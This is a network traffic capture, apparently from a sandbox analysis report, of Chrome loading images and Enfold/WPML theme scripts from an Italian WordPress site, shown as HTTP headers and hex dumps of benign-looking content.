                                                                                                                                              2025-01-03 16:33:01 UTC1688INData Raw: 70 74 2e 74 79 70 65 20 21 3d 20 73 2e 74 79 70 65 29 20 7b 0a 09 09 09 09 09 69 66 20 28 65 6c 65 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 20 3d 3d 3d 20 27 68 65 61 64 27 29 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 0a 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 69 66 20 28 21 24 73 63 72 69 70 74 2e 73 72 63 29 20 7b 0a 09 09 09 09 09 09 63 61 6c 6c 62 61 63 6b 28 29 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 24 73 63 72 69 70 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 24 73 63 72 69 70 74 29 3b 0a 0a 09 09 09 09 7d 20
                                                                                                                                              Data Ascii: pt.type != s.type) {if (elementPosition === 'head') {document.head.appendChild(s);} else {document.body.appendChild(s);}if (!$script.src) {callback()}$script.parentNode.removeChild($script);}


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              72192.168.2.164979189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC637OUTGET /wp-content/uploads/2021/06/CiPASSO-Home-1500x630.jpg HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC273INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                              Content-Length: 835036
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sat, 19 Jun 2021 08:45:52 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC16111INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 c0 00 c0 00 00 ff e2 02 64 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 54 6c 63 6d 73 04 30 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e5 00 06 00 13 00 08 00 14 00 02 61 63 73 70 4d 53 46 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 6c 63 6d 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 64 65 73 63 00 00 01 08 00 00 00 3e 63 70 72 74 00 00 01 48 00 00 00 4c 77 74 70 74 00 00 01 94 00 00 00 14 63 68 61 64 00 00 01 a8 00 00 00 2c 72 58 59 5a 00 00 01 d4 00 00 00 14 62 58 59 5a 00 00 01 e8 00 00 00 14 67 58 59 5a 00 00 01 fc 00 00 00 14 72
                                                                                                                                              Data Ascii: JFIFdICC_PROFILETlcms0mntrRGB XYZ acspMSFT-lcmsdesc>cprtHLwtptchad,rXYZbXYZgXYZr
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: d7 76 2f af 3f 05 be 83 fc 58 68 d2 c7 83 de 1a 06 a5 d9 d9 da a6 7e 10 92 07 58 f5 5d 47 0f 46 ee 0d 39 66 b1 2f c8 1a a0 59 82 35 ac 6e 5d 95 43 2d f5 83 97 28 ca 4c f9 53 82 54 b4 49 c4 a1 40 80 41 12 e5 95 4b 24 6a a2 47 89 4f 99 41 21 d9 88 8c 6f 0b c6 cf e1 7c 45 66 42 cc a2 91 39 04 87 b0 cb 91 44 3e 52 a4 82 58 90 59 cd 18 c5 88 f8 f3 f8 d6 f5 af e1 83 b7 bd 1f 3d 9b df fa e6 91 89 dd 38 19 cb 9d b7 2b e6 09 57 03 07 4c 95 16 36 c8 49 a4 8d 54 64 bd 08 8a 11 62 a8 8e 63 60 f0 bc 5a 6a d5 87 95 c5 f8 a4 a9 46 42 16 99 28 c6 cd 09 40 28 04 25 01 ce 54 87 a2 6a c1 87 4d 37 66 d7 81 c7 e3 71 73 f1 dc 37 01 8e 52 24 19 ea 5e 27 0c 89 81 4b ef 00 25 62 89 57 86 84 b5 cd 5c c7 2f 3d 11 f8 ac ef 7f 88 ff 00 8c 6f 47 87 75 f7 36 b9 dc 12 ae a5 97 27 cc d5
                                                                                                                                              Data Ascii: v/?Xh~X]GF9f/Y5n]C-(LSTI@AK$jGOA!o|EfB9D>RXY=8+WL6ITdbc`ZjFB(@(%TjM7fqs7R$^'K%bW\/=oGu6'
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 2a 9c 46 12 7a 8c dc c9 62 5b b8 59 ee 16 0b 29 04 04 b5 61 e5 96 f4 d4 08 b2 3c 7e df f7 fd 7d 8f 5e 9e 89 49 52 07 fc 85 74 17 03 ab 12 db f5 bc 61 8d 49 ea 63 91 7f c5 cf e1 62 0f 5f 7e 1f 9f bf f4 0d 1a 3d 47 d4 3f 45 a6 6e ef d2 62 84 34 59 ba d6 85 88 3e 76 b7 a0 8c a8 50 e4 44 92 e2 c5 34 ca 63 12 3a 83 31 54 6d c1 7a f3 bf 88 fd 9f c3 f1 5e 14 71 13 24 85 af 0a 14 8c 42 12 d9 f1 38 1c 40 c8 b9 4c 0b e6 91 30 27 12 95 59 09 96 b7 da 3d b7 e0 97 6c e7 f0 1e 39 89 e0 0b c5 ab 0b 83 ed 14 b4 23 0f 3e 62 89 95 c3 f8 cc 89 89 1c 3f 1e 84 87 ca 84 a9 7d d6 22 dd e2 16 01 70 23 f3 3b f8 d4 d7 65 ee 6f 5b 75 bd 61 74 59 fb 7b 15 f1 30 71 70 b4 ac 89 df 25 b0 a2 c2 59 61 6c 4f c5 48 a8 f3 bc 12 1f 94 f2 ba 2b b9 1f 31 95 6f aa af 87 7c 16 5f 06 e0 12 f0 72
                                                                                                                                              Data Ascii: *Fzb[Y)a<~}^IRtaIcb_~=G?Enb4Y>vPD4c:1Tmz^q$B8@L0'Y=l9#>b?}"p#;eo[uatY{0qp%YalOH+1o|_r
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 9b 6e ec 03 0b 5e 2b ae b8 99 70 e5 49 b9 09 2b 29 60 81 76 33 30 35 f2 90 b1 1c 00 37 06 fb 92 2b 80 7a bd 5a 42 c7 87 e5 6a 6a 48 e6 59 bc ba c1 b0 f3 d2 14 3f e3 40 75 34 f4 e5 4e ba b4 39 bb 57 3f 11 1d 9b 32 65 54 90 05 91 6d 5d a2 28 50 dc a4 15 6e 43 6d fa 6b 90 2a e8 75 4d 88 96 a4 12 4a 49 1a 1f 21 5d af fc b4 68 65 4e ef 12 92 96 21 a8 ff 00 6d 8d bc ee 62 4d cc 8f 4c f9 61 e2 6c 79 f7 81 b5 78 41 1e e8 f7 06 0d 61 a9 8f 2a 14 03 c1 e7 9e aa d4 19 26 a4 28 07 36 66 af 27 ae f4 ad 9a 25 21 65 c2 72 96 51 6a f3 b0 f9 9c 07 df 58 13 43 d3 8e a4 62 c3 55 8c 32 c9 4d 37 91 f5 b8 5b 20 86 b5 50 4d d9 e1 45 d7 3c 74 ad 52 d4 80 92 5f 2b f9 94 a8 74 03 5b 33 b1 e8 1c 71 fd 3c b2 b2 b7 52 8a 40 4e 81 24 82 5b a3 80 fa bb 06 a1 8f 43 9f 09 5d bd a4 e9 3f
                                                                                                                                              Data Ascii: n^+pI+)`v3057+zZBjjHY?@u4N9W?2eTm](PnCmk*uMJI!]heN!mbMLalyxAa*&(6f'%!erQjXCbU2M7[ PME<tR_+t[3q<R@N$[C]?
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 08 69 42 fd cf 27 81 cd 9f 39 fc 56 03 bd 5b 91 e1 20 ea 1f ca a4 f2 f6 f0 14 99 89 51 0a 0d 52 34 2d 5e a6 9e ad 48 53 6e e3 54 76 70 58 ac 81 54 b5 02 19 15 54 31 dc 1d 48 ae 7d ac 9f 02 89 ba d9 9c 38 65 4a 4a 7a 87 0e 1b ad 3a 8d 29 12 11 35 ae 7a f3 fa 16 e7 bf d9 d7 85 dd d0 32 fc a6 7f e4 34 6a 4b c8 db 95 99 54 7d 00 ef 70 0b 02 2e f6 91 e0 fb f5 05 5c 31 94 02 68 49 d4 8d dd b4 f3 2c 44 10 ce 4a 81 04 9b 16 b9 bf 94 32 75 3e e0 93 22 76 30 ba 32 86 93 6b 8b a0 a0 8f a1 bd 85 0a 00 37 9f 23 82 0f 57 58 7c 1a 65 4b 01 47 fb 2b 5b 6b e7 00 70 56 1b 6d 8f 38 90 3b 6f 51 df 0c 2f 23 59 0d 76 2d ad 65 ae 38 b1 5e e4 0e 00 f6 e3 aa 5c 73 49 70 28 e5 4e 6a 5b 50 74 1a d0 6e dd 22 c6 54 92 40 2d 42 1c d5 d9 b5 bf 58 77 e7 cb 0e 54 60 6e 2e 59 d8 0b 5a 57
                                                                                                                                              Data Ascii: iB'9V[ QR4-^HSnTvpXTT1H}8eJJz:)5z24jKT}p.\1hI,DJ2u>"v02k7#WX|eKG+[kpVm8;oQ/#Yv-e8^\sIp(Nj[Ptn"T@-BXwT`n.YZW
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 70 b3 54 8c eb 08 24 f7 41 44 96 d1 95 6a be cc 00 3a c6 67 89 70 d9 45 4a 4f 74 00 24 9c c1 a9 ca da 33 86 be f7 8b 6b a8 c6 33 b0 d3 b8 74 6c a9 30 3b 87 0a 41 95 1c b8 ee 23 98 3c 64 11 91 0b 0b fa c6 c5 0b 56 02 9a 20 f9 e8 93 3b f9 72 ff 00 5b 80 9e ac 36 3f 0f 34 4e 33 65 ab 2a 94 80 29 91 43 c5 6a 1a d4 82 76 6a 8e 15 8d c5 f0 1e 2d 2e 74 b3 de 61 31 09 ee e7 24 82 b4 f7 46 8a 96 b0 e0 04 4d 62 16 18 3a 5f c4 2b 16 7b e1 3f e3 17 d5 4e e4 f5 37 b5 fd 27 ee 5d 7e 3c e7 c9 ce fc 36 ed 46 05 96 6c bd 3a 3b 19 09 f3 09 25 33 11 46 e4 70 ce ac a0 82 17 cf 5e dd f0 77 e2 27 69 78 9f 1d 47 07 e3 3c 45 78 ec 2a c2 52 d8 8f 14 c6 24 24 27 38 29 19 5a 8d 97 cd 8d 3b f1 0b b1 9d 90 e2 dc 0f 8c f1 cc 1f 67 e4 61 a7 a3 01 88 c7 4a 9d c3 47 e9 54 8c 54 89 45 48
                                                                                                                                              Data Ascii: pT$ADj:gpEJOt$3k3tl0;A#<dV ;r[6?4N3e*)Cjvj-.ta1$FMb:_+{?N7']~<6Fl:;%3Fp^w'ixG<Ex*R$$'8)Z;gaJGTTEH
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: c6 9d 54 c4 d9 0e bf 2e 36 51 f5 59 2c 3a f2 ec 6c ae 2f c0 f8 ff 00 18 c6 70 fc 0c d9 b8 44 4b 13 90 80 42 13 89 96 b9 7d ec dc 30 51 56 64 f7 73 d0 92 e4 0f 99 d2 54 d1 f6 0e 01 58 2f 8a 7f 0a 7b 3d 80 e3 d3 70 98 ac 72 f0 d8 89 09 c6 61 a6 cb 5f 11 e1 18 ec 1e 31 28 c2 e2 26 ca 96 55 3b f4 f3 f0 e3 bc 9e 12 85 12 94 a8 10 09 8e c3 fa 0b eb cf 65 7c 4c f6 6e 2f ab dd 8d 9f 8f 97 a5 f7 34 8f 98 31 a3 92 33 91 81 2b 30 46 c2 cb 40 db 92 5c 7d 8a ad b8 8e 49 00 9a 23 af 1d e0 5c 7e 67 6a b8 97 1b e2 58 99 0a e1 fc 57 fd d2 72 e7 70 d5 24 2e 6c a2 12 99 72 e5 2e 65 55 44 a7 32 14 0f 74 b0 a3 95 4a 22 3c ef b6 9d 90 9d d8 21 c2 f8 04 e9 aa c6 70 d9 7c 36 54 ac 27 11 00 99 58 99 65 4a 99 33 11 2d 4c ea cc a5 64 52 47 89 25 3e 24 8d 67 e3 12 33 e3 ff 00 2d 8b
                                                                                                                                              Data Ascii: T.6QY,:l/pDKB}0QVdsTX/{=pra_1(&U;e|Ln/413+0F@\}I#\~gjXWrp$.lr.eUD2tJ"<!p|6T'XeJ3-LdRG%>$g3-
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 8b af 3d 30 5c 75 10 a3 e6 20 78 ba fd bf e9 7d 1e 06 b3 a6 c7 f1 fc c6 a4 8d b7 e2 ec 02 7d 88 f2 28 73 cf df da ba 50 d4 a8 25 f9 b4 60 30 55 05 48 3c fb f2 09 f7 e3 a5 1c 51 72 f0 1b 32 9e 78 1c d1 3e 05 dd 7f c6 c7 4a 39 18 06 c9 fc b4 68 58 ff 00 53 f6 1f fc bf 7e 94 28 c5 f9 34 78 ff 00 be 3a 50 a0 0e 94 28 3d a6 29 39 a9 40 1b 1e 49 fb 11 c8 fd 47 07 f5 aa e4 f4 c5 d8 75 fc 18 74 bf fa 83 cb ee 61 d2 f4 69 01 bb e2 fd b8 24 df 16 7f 4f d7 9e 85 13 54 09 04 0d 60 48 d7 6a 8b 20 db 79 a3 55 fe 60 49 02 b8 17 c7 27 fa 74 a1 a9 49 0e ed 1b 30 06 f6 95 6a 27 6a a1 b0 d5 e6 85 9e 7e fc fd ba 50 f8 da 35 6d c2 e8 86 07 e8 e6 ac 8f 37 f7 17 40 57 fc fa 50 a2 5c f4 3c ba fa 87 a4 91 40 91 30 52 45 8b 64 04 6e 17 54 03 57 9f bf b7 4c 5a 48 93 39 45 88 52 6d
                                                                                                                                              Data Ascii: =0\u x}}(sP%`0UH<Qr2x>J9hXS~(4x:P(=)9@IGutai$OT`Hj yU`I'tI0j'j~P5m7@WP\<@0REdnTWLZH9ERm
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 9e 3f 29 b8 de 26 46 37 b4 dc 53 1b 84 98 26 61 71 38 fc 44 ec 3c c4 f7 80 2d 2b 9c 4e 71 de 00 58 f2 a5 77 8b b7 db 90 33 69 18 bb 64 2e 02 a3 16 54 b2 ac 76 28 b5 5f ab 82 48 fb 91 f6 b1 d5 7c c2 73 aa a6 fa 1e 43 d9 8b ac ab 5c b4 92 4b 91 43 ad db e8 18 1b 50 1a c4 47 ea 06 a9 89 a7 6b fa 5c ba ae 60 c7 c2 83 52 43 be 60 55 55 23 82 c9 a3 66 96 89 ae 7f 6e 87 c4 12 a9 d2 25 4b 96 92 56 99 0b ca 13 75 2b 29 61 c9 e9 56 04 53 61 1e a7 f0 2f b4 3c 03 b3 1f 10 70 bc 4f b4 3c 4a 47 0a c0 a2 5a 56 67 e2 94 12 81 91 68 24 a9 45 b2 a4 33 bb 52 ac f6 33 cf c4 97 af 1d b5 dd 9d ab 83 da fa 1f a8 52 ea ba 16 36 83 db ed 87 a2 8c cc b3 a6 c5 9b 0e 1c 10 ca d1 62 4d 14 31 06 59 37 90 22 0d 1a b3 bb 2d 16 6a f2 ce c5 f6 73 1f 81 c4 4f c4 e3 30 5d d4 f4 63 27 94 4e
                                                                                                                                              Data Ascii: ?)&F7S&aq8D<-+NqXw3id.Tv(_H|sC\KCPGk\`RC`UU#fn%KVu+)aVSa/<pO<JGZVgh$E3R3R6bM1Y7"-jsO0]c'N
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: bc 6e 0a 0c 60 79 36 3a 8b 30 82 0b 29 88 07 7f d9 bc ff 00 c8 32 12 80 f9 f5 d5 a8 06 fc f5 d0 42 97 c8 42 26 36 76 ef 60 05 16 fa 94 8b 5a da 18 10 68 ee 22 8d 11 7e fd 47 50 19 41 70 4b d4 83 ef 97 48 7a 47 8c e5 24 8c ae e6 a2 e2 9d 75 b8 b5 8d e1 07 39 3e 73 9f 9b 23 29 50 55 9d e3 20 2a 03 4b e0 03 c8 e0 10 3c f9 e8 c0 3e a0 75 f7 ef 94 3c ab 28 f1 1a f2 db e9 05 74 dc 64 96 67 7d ea ee 18 08 ca f0 c8 b1 d0 04 9f a8 28 a7 37 63 cd 71 d7 54 42 52 05 da ae 2b a9 14 84 8f 1a b3 0b 1a 07 bb d2 2c af 60 e9 e3 6c 26 ad 5f 82 16 26 62 76 95 01 de ac 78 f1 ed c9 3d 67 b1 eb 4d f4 19 8b 72 05 fe df 9d 62 76 5c b2 c0 1a 01 60 2b f8 f3 e5 16 c3 b5 fb 6c 49 3c 32 0f ae 46 43 f4 ec fe 55 ee dd 18 70 bc ad 42 41 1c 1e 78 af be 53 19 88 a9 0e 52 1c 50 16 2f 56 7a
                                                                                                                                              Data Ascii: n`y6:0)2BB&6v`Zh"~GPApKHzG$u9>s#)PU *K<>u<(tdg}(7cqTBR+,`l&_&bvx=gMrbv\`+lI<2FCUpBAxSRP/Vz


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              73192.168.2.164979489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC400OUTGET /wp-content/themes/enfold/config-wpml/wpml-mod.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 614
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC614INData Raw: 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 09 7b 09 20 20 20 0a 09 09 2f 2a 2a 0a 09 09 20 2a 20 52 65 6d 6f 76 65 20 54 68 65 6d 65 73 20 64 75 70 6c 69 63 61 74 65 64 20 6c 61 6e 67 75 61 67 65 20 73 77 69 74 63 68 65 72 20 66 6c 61 67 73 20 66 72 6f 6d 20 42 75 72 67 65 72 20 6d 65 6e 75 0a 09 09 20 2a 09 09 2d 20 65 78 69 73 74 20 69 6e 20 73 65 63 6f 6e 64 61 72 79 20 6d 65 6e 75 0a 09 09 20 2a 09 09 2d 20 65 78 69 73 74 20 62 65 73 69 64 65 20 73 65 61 72 63 68 20 69 63 6f 6e 0a 09 09 20 2a 2f 0a 09 09 24 28 27 62 6f 64 79 27 29 2e 6f 6e 28 20 27 61 76 69 61 5f 62 75 72 67 65 72 5f 6c 69 73 74
                                                                                                                                              Data Ascii: (function($){ "use strict";$(document).ready(function(){ /** * Remove Themes duplicated language switcher flags from Burger menu *- exist in secondary menu *- exist beside search icon */$('body').on( 'avia_burger_list


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              74192.168.2.164979689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC647OUTGET /wp-content/plugins/sitepress-multilingual-cms/res/flags/it.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC269INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 267
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Thu, 10 Dec 2020 02:53:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC267INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 0c 08 02 00 00 00 e0 70 7a eb 00 00 00 2b 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 64 6f 20 32 39 20 64 65 63 20 32 30 30 35 20 30 32 3a 33 35 3a 33 37 20 2b 30 31 30 30 9f 03 14 04 00 00 00 07 74 49 4d 45 07 d5 0c 1d 01 28 1a 48 59 78 98 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 63 49 44 41 54 78 da dd d1 31 0e 80 20 0c 85 e1 87 e1 4c de ff 22 1e c0 86 4e 20 8e 15 8a 03 21 86 94 d5 3f 4c 25 5f 3a d4 e1 04 6e 20 02 19 2d d9 05 43 ce 0d 03 5f 4d 52 79 c1 98 54 16 d5 1c 56 53 0a 95 e5 85 3d 25 56 b6 2d 88 ae 3f 33 df 1f da 52 78 0f d0 58 d2 a7 31 f3 dc 7c 33 22 9a b3 f2 fd 00 7c d9 28 de 2d 94 57 94
                                                                                                                                              Data Ascii: PNGIHDRpz+tEXtCreation Timedo 29 dec 2005 02:35:37 +0100tIME(HYxpHYs~gAMAacIDATx1 L"N !?L%_:n -C_MRyTVS=%V-?3RxX1|3"|(-W


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              75192.168.2.164979589.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC394OUTGET /wp-content/themes/enfold/js/avia-compat.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2106
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC2106INData Raw: 2f 2a 20 0a 09 74 68 69 73 20 70 72 65 76 65 6e 74 73 20 64 6f 6d 20 66 6c 69 63 6b 65 72 69 6e 67 20 66 6f 72 20 65 6c 65 6d 65 6e 74 73 20 68 69 64 64 65 6e 20 77 69 74 68 20 6a 73 2c 20 6e 65 65 64 73 20 74 6f 20 62 65 20 6f 75 74 73 69 64 65 20 6f 66 20 64 6f 6d 2e 72 65 61 64 79 20 65 76 65 6e 74 2e 61 6c 73 6f 20 61 64 64 73 20 73 65 76 65 72 61 6c 20 65 78 74 72 61 20 63 6c 61 73 73 65 73 20 66 6f 72 20 62 65 74 74 65 72 20 62 72 6f 77 73 65 72 20 73 75 70 70 6f 72 74 20 0a 09 74 68 69 73 20 69 73 20 61 20 73 65 70 61 72 61 74 65 20 66 69 6c 65 20 74 68 61 74 20 6e 65 65 64 73 20 74 6f 20 62 65 20 6c 6f 61 64 65 64 20 61 74 20 74 68 65 20 74 6f 70 20 6f 66 20 74 68 65 20 70 61 67 65 2e 20 6f 74 68 65 72 20 6a 73 20 66 75 6e 63 74 69 6f 6e 73 20 61
                                                                                                                                              Data Ascii: /* this prevents dom flickering for elements hidden with js, needs to be outside of dom.ready event.also adds several extra classes for better browser support this is a separate file that needs to be loaded at the top of the page. other js functions a


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              76192.168.2.164979889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC647OUTGET /wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC269INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 600
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Thu, 10 Dec 2020 02:53:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
